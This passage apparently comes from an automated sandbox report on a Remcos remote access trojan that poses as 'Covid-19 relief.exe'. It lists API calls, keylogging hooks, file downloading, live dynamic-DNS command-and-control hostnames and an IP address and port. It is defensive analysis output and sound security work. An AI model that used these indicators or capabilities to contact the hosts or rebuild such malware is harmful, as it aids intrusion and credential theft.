U?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$
char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr5_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocato
r@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_str
ing@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE5_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV0
1@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV0
1@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A

            Networking:

            Uses dynamic DNS services
            Source: unknown | DNS query: name: chaseric.ddns.net
            Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 194.5.97.21:24002
            Source: Joe Sandbox View | ASN Name: DANILENKODE DANILENKODE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00402149
            Source: unknown | DNS traffic detected: queries for: chaseric.hopto.org
            Source: Covid-19 relief.exe | String found in binary or memory: https://login.microsoftonline.com
            Source: Covid-19 relief.exe | String found in binary or memory: https://management.azure.com/
            Source: Covid-19 relief.exe | String found in binary or memory: https://management.azure.com/Chttps://login.microsoftonline.com
            Source: Covid-19 relief.exe | String found in binary or memory: https://management.azure.com/subscriptions/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Contains functionality to capture and log keystrokes
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Esc] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Enter] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Tab] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Down] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Right] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Up] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Left] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [End] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [F2] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [F1] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Esc] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Enter] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Tab] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Down] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Right] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Up] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Left] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [End] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [F2] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [F1] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Del] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: [Del] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,2_2_0040532D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,5_2_0040532D

            E-Banking Fraud:

            Yara detected Remcos RAT
            Source: Yara match | File source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
